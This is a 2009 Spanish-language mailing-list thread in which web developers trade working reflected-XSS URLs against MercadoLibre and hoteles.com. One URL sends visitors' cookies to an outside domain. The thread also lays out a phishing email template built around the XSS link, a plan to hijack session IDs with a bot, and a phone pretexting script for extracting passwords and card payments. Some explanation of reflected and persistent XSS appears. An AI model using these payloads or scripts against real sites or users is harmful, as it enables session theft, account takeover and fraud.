programar for dummies

0 views
Skip to first unread message

Demián Andrés Rodriguez

unread,
Oct 17, 2009, 4:55:45 PM10/17/09
to weban...@googlegroups.com

Andrés Gattinoni

unread,
Oct 17, 2009, 4:56:44 PM10/17/09
to weban...@googlegroups.com
jajajajajaa

On Sat, Oct 17, 2009 at 5:55 PM, Demián Andrés Rodriguez
<demi...@gmail.com> wrote:
> http://listado.mercadolibre.com.ar/xenon%27%3Bdocument.body.innerHTML%3D%27programar-for-dummies
> >
>

Rodrigo Arce

unread,
Oct 17, 2009, 4:58:35 PM10/17/09
to weban...@googlegroups.com
Uhh hermoso, a robar cookies! :P

• Rodrigo Arce
« web developer ― http://rodrigoarce.com »



2009/10/17 Andrés Gattinoni <andresg...@gmail.com>:

Demián Andrés Rodriguez

unread,
Oct 17, 2009, 5:04:20 PM10/17/09
to weban...@googlegroups.com
no creo, al menos escapan los tags html y parentesis, no podes inyectar nada malvado.

Rodrigo Arce

unread,
Oct 17, 2009, 5:15:49 PM10/17/09
to weban...@googlegroups.com

Demián Andrés Rodriguez

unread,
Oct 17, 2009, 6:38:20 PM10/17/09
to weban...@googlegroups.com
mm sip, no se me habia ocurrido, igual me da miedo probarla :P

Rodrigo Arce

unread,
Oct 17, 2009, 6:45:59 PM10/17/09
to weban...@googlegroups.com
Ja, no guardo nada. Igual deslogueate primero muahahaha

Ah escribi un post http://blog.rodrigoarce.com/ataque-xss-ejemplo-real/

No se cual es tu blog, para darte los créditos correspondientes o
decime que quito toda referencia a vos si no queres quedar pegado.

• Rodrigo Arce
« web developer ― http://rodrigoarce.com »



On Sat, Oct 17, 2009 at 7:38 PM, Demián Andrés Rodriguez

Demián Andrés Rodriguez

unread,
Oct 17, 2009, 6:56:13 PM10/17/09
to weban...@googlegroups.com
jaja me hice famoso, dale publica mi nombre :D

2009/10/17 Rodrigo Arce <rsa...@gmail.com>

LICH

unread,
Oct 18, 2009, 2:02:23 PM10/18/09
to webandbeer
maravishoso!!

On 17 oct, 19:56, Demián Andrés Rodriguez <demia...@gmail.com> wrote:
> jaja me hice famoso, dale publica mi nombre :D
>
> 2009/10/17 Rodrigo Arce <rsa...@gmail.com>
>
>
>
>
>
> > Ja, no guardo nada. Igual deslogueate primero muahahaha
>
> > Ah escribi un posthttp://blog.rodrigoarce.com/ataque-xss-ejemplo-real/
>
> > No se cual es tu blog, para darte los créditos correspondientes o
> > decime que quito toda referencia a vos si no queres quedar pegado.
>
> > * Rodrigo Arce
> > << web developer --http://rodrigoarce.com>>
>
> > On Sat, Oct 17, 2009 at 7:38 PM, Demián Andrés Rodriguez
> > <demia...@gmail.com> wrote:
> > > mm sip, no se me habia ocurrido, igual me da miedo probarla :P
>
> > > On Sat, Oct 17, 2009 at 6:15 PM, Rodrigo Arce <rsa...@gmail.com> wrote:
>
> >http://listado.mercadolibre.com.ar/xenon'%3Bdocument.location%3D'http...
>
> > >> * Rodrigo Arce
> > >> << web developer --http://rodrigoarce.com>>
>
> > >> 2009/10/17 Demián Andrés Rodriguez <demia...@gmail.com>:
> > >> > no creo, al menos escapan los tags html y parentesis, no podes
> > inyectar
> > >> > nada
> > >> > malvado.
>
> > >> > On Sat, Oct 17, 2009 at 5:58 PM, Rodrigo Arce <rsa...@gmail.com>
> > wrote:
>
> > >> >> Uhh hermoso, a robar cookies! :P
>
> > >> >> * Rodrigo Arce
> > >> >> << web developer --http://rodrigoarce.com>>
>
> > >> >> 2009/10/17 Andrés Gattinoni <andresgattin...@gmail.com>:
>
> > >> >> > jajajajajaa
>
> > >> >> > On Sat, Oct 17, 2009 at 5:55 PM, Demián Andrés Rodriguez
> > >> >> > <demia...@gmail.com> wrote:
>
> >http://listado.mercadolibre.com.ar/xenon%27%3Bdocument.body.innerHTML...

Tio Oscar

unread,
Oct 19, 2009, 1:39:33 AM10/19/09
to weban...@googlegroups.com
Que buenas ofertas!!

http://listado.mercadolibre.com.ar/OFERTAS-'%3bwindow.location%3d'http%3a%2f%2fôô.com.ar%2fx%3fq%3dm%3a'%2bdocument.cookie%2b'%2f

xD jajajajajajajaja
--
El Tio ~ Programador, hacker y filósofo
Blog: http://blog.exodica.com.ar
Linked'in: http://www.linkedin.com/in/ogentilezza
Tel: [+54 11] 638-LINUX (584689)
Movil: [+54 9 11] 6654-5316

No al canon digital en Argentina! www.noalcanon.org

Demián Andrés Rodriguez

unread,
Oct 19, 2009, 8:45:37 AM10/19/09
to weban...@googlegroups.com
igual no usan cookies para recordar la sesion, si el usuario no esta logeado no le robas nada.

pablof...@gmail.com

unread,
Oct 19, 2009, 10:00:45 AM10/19/09
to weban...@googlegroups.com
El session Id esta en la cookie.


----------------------------------------
Pablo Morales
blog: http://blog.pablo-morales.com
linkedln: http://www.linkedin.com/pub/9/528/21
skype: pablofmorales
gtalk: pablof...@gmail.com
msn: pfm...@hotmail.com



2009/10/19 Demián Andrés Rodriguez <demi...@gmail.com>

Diego Gentilezza

unread,
Oct 19, 2009, 10:24:20 AM10/19/09
to weban...@googlegroups.com
Es muy cierto que sin estar logueado no se puede hacer mucho. Pero es una excelente oportunidad para phishing.

Imaginate el siguiente mail bien lookeado con imágenes de ML:



-----------------------------------------------------------------------------------------------------
¡¡Ofertas imperdibles en Mercado Libre SOLO POR HOY para usuarios registrados!!
En el mes de su sexto cumpleaños Mercado Libre festeja con sus usuarios ofreciendo estas excelentes ofertas ¡¡SOLO POR HOY!!

Televisor 29 pulgadas $450
Reproductores BluRay $280
Heladeras 1000 litros $899

¿Cómo acceder?

Entrá a http://www.mercadolibre.com.ar/jm/myML e ingresá al sistema con usuario
Luego ingresá a http://listado.mercadolibre.com.ar/OFERTAS y listo.

*Promoción válida para usuarios de Mercado Libre registrados antes del 1 de Agosto de 2009 con más de 3 calificaciones positivas y con cuenta activa que no registre deuda, para usuarios de Capital Federal y Gran Buenos Aires.
Las ofertas estarán disponibles hasta las 23:59 del día en que se emitió el mail.
El listado de productos de ofertas aparecerá sólo cuando el usuario esté registrado.
Las ofertas sólo estarán disponibles accediendo desde el dominio "mercadolibre.com.ar" o sus subdominios. No aparecerán ofertas publicadas si se accedió desde otro país o a través del dominio internacional "mercadolibre.com"
(Con esto último le generás credibilidad a la URL).

-----------------------------------------------------------------------------------------------------


Si veo un mail de estos dando vueltas por ahí sabré que fue uno de ustedes.

Rodrigo Arce

unread,
Oct 19, 2009, 10:39:34 AM10/19/09
to weban...@googlegroups.com
Nooo mira esta foto de pampita desnuda!! http://tiny.cc/pampitadesnuda

• Rodrigo Arce
« web developer ― http://rodrigoarce.com »



2009/10/19 Diego Gentilezza <dgent...@gmail.com>:

Jonathan Muszkat

unread,
Oct 19, 2009, 10:43:19 AM10/19/09
to weban...@googlegroups.com
Mucho no sirve porque guarda por cookie el username pero no la
password asi que de que te sirve saber nombres de usuario? sin la
password?

2009/10/19 Rodrigo Arce <rsa...@gmail.com>:
>
> Nooo mira esta foto de pampita desnuda!! http://tiny.cc/pampitadesnuda
>
> * Rodrigo Arce
> << web developer -- http://rodrigoarce.com >>
--
Jonathan Ariel Muszkat
Mail: mus...@gmail.com
Msn: jony...@hotmail.com
Móvil: (011)15-4-399-6363
Skype: jony.musky
Linkedin: http://www.linkedin.com/in/musky

Diego Gentilezza

unread,
Oct 19, 2009, 10:43:28 AM10/19/09
to weban...@googlegroups.com
Terrible!!
Pero hubo photoshop ahi seguro

pablof...@gmail.com

unread,
Oct 19, 2009, 10:52:49 AM10/19/09
to weban...@googlegroups.com
Paremos la moto loco.

NO JODAN CON PAMPITA.

Nada  de chiste y esas cosas. Cuando vi la frase no me importo nada, y entre.




----------------------------------------
Pablo Morales
blog: http://blog.pablo-morales.com
linkedln: http://www.linkedin.com/pub/9/528/21
skype: pablofmorales
gtalk: pablof...@gmail.com
msn: pfm...@hotmail.com



2009/10/19 Diego Gentilezza <dgent...@gmail.com>

Andrés Gattinoni

unread,
Oct 19, 2009, 10:53:26 AM10/19/09
to weban...@googlegroups.com
El tema es hacer hijacking de sesión a partir del session_id y ahí sí
robarte otros datos más útiles.
Cuando recibís el session id, iniciás un script que simule ser el
chaboncito, entre a su cuenta, vaya a la parte de sus datos, y baje
todo lo que pueda...

2009/10/19 Jonathan Muszkat <mus...@gmail.com>:

Diego Gentilezza

unread,
Oct 19, 2009, 10:59:22 AM10/19/09
to weban...@googlegroups.com
Si guarda el id de session podés emular un navegador y meterte en los datos personales.
Podes sacar el teléfono, cambiarle el pass y después llamarlo para decirle que hubo un problema en ML y que le tenés que blanquear el pass sino no va a poder entrar.
Le mensionás todos los datos del registro que tenés (dirección, email, etc), para que entre en confianza y sepas que sos de ML.
El chabón te va a sugerir un pass nuevo (porque la IS así lo demuestra, y si llegaste a la instancia de hablar con él, seguro que te lo va a dar) y listo, todos contentos y vos con el pass del chabón.
¿Qué aplicación puede tener esto?
No se me ocurre. Simplemente hinchar las pelotas o ir a ML con una lista de usuarios cagados por vos esperando que te manden en cana o que te contraten como jefe de seguridad.

Diego Gentilezza

unread,
Oct 19, 2009, 11:00:44 AM10/19/09
to weban...@googlegroups.com
ovbio lo de emular el navegador y ver sus datos personales lo tenés que hacer en cuanto el chabón cae en la trampa. Porque si lo hacés todo junto a la noche las sessiones van a estar todas vencidas

Rodrigo Arce

unread,
Oct 19, 2009, 11:30:07 AM10/19/09
to weban...@googlegroups.com
Imaginate si logras un par de usuarios vendedores con confianza.

• Rodrigo Arce
« web developer ― http://rodrigoarce.com »

Tio Oscar

unread,
Oct 19, 2009, 1:31:18 PM10/19/09
to weban...@googlegroups.com
Que poca imaginación chicos, los unicos que entendieron la
peligrocidad del asunto fueron fue diego y andres.

Yo lo único que tengo en el dominio ôô.com.ar es un posteador de las
cookies en twitter, para romper las bolas, pero si quiero hacer algo
de verdad, no me quedaria esprando a que alguien caiga, simplemente
haria bot, que al llegar los datos se ponga a hacer lo que me
interesa, hasta puedo dejarlo "pingeando" para que la session no
caduque.

Los datos reales de vendedores importantes son caros, mas porque ML no
te deja tenerlos, osea que te podes hacer de una base de datos de
vendedores que no pagan impuestos ni facturan legalmente (osea que
todo es mas barato) y hasta te ahorras la comicion de mercado libre.
Hasta hacer lo que dijo Diego y hace un ataque de IS para que te de su
password, para que te de mas datos, para simular ser un cobrador;

H: Hola lo llamo de mercado libre para avisarle que su cuenta fue
desabilitada hasta que pague lo que debe, como desea pagar.
U: Tarjeta
H: :-) u fucked

Por otro lado este tipo de vulnerabilidad de llama "reflejada" o no
persistente, asi que el fuerte mas comun son ataques de phishing al no
ser que como usuario registrado postiemos esta url en un post como
"otras ofertas mias->" o algo asi, ahí se convertiría en un XSS
persistente y podria ser peor. Cualquiero usuario que haga click ahí
desde adentro de ML mandaría sus cookies.

Como sea, creo que en ML para comprar algo o mandar un comentario hay
que mandar la password de nuevo, esto es un metodo de seguridad que
usan muchas aplicaciones para evitar que estos ataques sean
peligrosos.

El día 19 de octubre de 2009 13:30, Rodrigo Arce <rsa...@gmail.com> escribió:
>
> Imaginate si logras un par de usuarios vendedores con confianza.
>

Demián Andrés Rodriguez

unread,
Nov 5, 2009, 9:09:58 AM11/5/09
to weban...@googlegroups.com
aca hay otra web para hackear: http://www.hoteles.com/?requestedLanguage="/>programar%20for%20dummies

2009/10/19 Tio Oscar <tio...@gmail.com>

Rodrigo Arce

unread,
Nov 5, 2009, 9:11:03 AM11/5/09
to weban...@googlegroups.com
Te engolosinaste :P

• Rodrigo Arce
« web developer ― http://rodrigoarce.com »



2009/11/5 Demián Andrés Rodriguez <demi...@gmail.com>:

Cesar Casas

unread,
Nov 5, 2009, 4:15:07 PM11/5/09
to weban...@googlegroups.com
Tas incontrolable Rodriguez!
--
Cesar Casas
Tec. Telecomunicaciones
WebMaster / DBA
NiceStream

Tel: +5411-3644-5730

Demián Andrés Rodriguez

unread,
Nov 5, 2009, 4:26:18 PM11/5/09
to weban...@googlegroups.com
ufff habló el que hackeó Holacine :P

2009/11/5 Cesar Casas <lort...@gmail.com>

Jonathan Muszkat

unread,
Nov 5, 2009, 7:35:08 PM11/5/09
to weban...@googlegroups.com

Demián Andrés Rodriguez

unread,
Nov 5, 2009, 8:01:56 PM11/5/09
to weban...@googlegroups.com
en chromium no funca, en realidad no entiendo como funciona el hack de mercadolibre ya que el body no existe cuando se llama al script, eso esta en el head... es un misterio.

2009/11/5 Jonathan Muszkat <mus...@gmail.com>

Cesar Casas

unread,
Nov 5, 2009, 8:04:24 PM11/5/09
to weban...@googlegroups.com
No es necesario que este en el head

Demián Andrés Rodriguez

unread,
Nov 5, 2009, 8:09:44 PM11/5/09
to weban...@googlegroups.com
no entendiste nada negro, en ML el script se ejecuta en el head

2009/11/5 Cesar Casas <lort...@gmail.com>

Tio Oscar

unread,
Nov 6, 2009, 8:35:17 AM11/6/09
to weban...@googlegroups.com
No demian, es un script pedorro en el medio de la pagina

El día 5 de noviembre de 2009 22:09, Demián Andrés Rodriguez
<demi...@gmail.com> escribió:
> no entendiste nada negro, en ML el script se ejecuta en el head
>
> 2009/11/5 Cesar Casas <lort...@gmail.com>
>>
>> No es necesario que este en el head
>>
>> El 5 de noviembre de 2009 22:01, Demián Andrés Rodriguez
>> <demi...@gmail.com> escribió:
>>>
>>> en chromium no funca, en realidad no entiendo como funciona el hack de
>>> mercadolibre ya que el body no existe cuando se llama al script, eso esta en
>>> el head... es un misterio.
>>>
>>> 2009/11/5 Jonathan Muszkat <mus...@gmail.com>
>>>>
>>>> No queria ser menos:
>>>> http://tinyurl.com/sonico-musky
>>>> http://tinyurl.com/olx-musky
>>>>
>>>> 2009/11/5 Demián Andrés Rodriguez <demi...@gmail.com>
>>>>>
>>>>> ufff habló el que hackeó Holacine :P
>>>>>
>>>>> 2009/11/5 Cesar Casas <lort...@gmail.com>
>>>>>>
>>>>>> Tas incontrolable Rodriguez!
>>>>>>
>>>>>> El 5 de noviembre de 2009 11:11, Rodrigo Arce <rsa...@gmail.com>
>>>>>> escribió:
>>>>>>>
>>>>>>> Te engolosinaste :P
>>>>>>>

Demián Andrés Rodriguez

unread,
Nov 6, 2009, 8:43:47 AM11/6/09
to weban...@googlegroups.com
a es verdad, es un script centrado, esta dentro de un <center>, no la tenia esa, queda mas prolijo asi el js....

2009/11/6 Tio Oscar <tio...@gmail.com>

Tio Oscar

unread,
Nov 6, 2009, 9:17:22 AM11/6/09
to weban...@googlegroups.com
Obvio, nunca usaste:

<script type="text/javascript" style="text-align: center; margin: 0px auto;">

El día 6 de noviembre de 2009 10:43, Demián Andrés Rodriguez
Reply all
Reply to author
Forward
0 new messages